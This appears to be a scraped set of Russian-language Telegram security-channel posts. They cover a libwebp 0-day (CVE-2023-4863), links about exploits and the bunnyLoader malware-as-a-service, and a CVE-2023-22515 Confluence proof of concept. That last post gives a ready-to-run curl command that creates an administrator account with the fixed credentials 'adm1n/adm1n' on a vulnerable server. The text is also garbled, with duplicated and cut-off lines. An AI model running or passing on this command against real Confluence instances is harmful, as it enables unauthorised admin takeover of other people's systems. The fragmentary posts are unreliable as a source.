0-day для CVE-2023-4863 носится по интернету (chrome не при чем, дыра в
И все бы ничего, но
Список покрытия
libwebp image library).И все бы ничего, но
libwebp интегрирована во всё (ну почти)Список покрытия
👍14😱1
Интересное на почитать
*
When Exploits Arent Binary
*
Malware as a service (bunnyLoader)
*
#exploits #malware #read
*
When Exploits Arent Binary
*
Malware as a service (bunnyLoader)
*
#exploits #malware #read
👍8
Ох твою мать а, не было печали...)))))))))))))))))
Короче, план такой
Надеюсь консультанты изXpanamas ciscoTalos
Короче, план такой
Надеюсь консультанты из
👍4🔥3😱1
CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
login - adm1n/adm1n
Почитать как это работает
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action login - adm1n/adm1n
Почитать как это работает
🔥14😱6👍2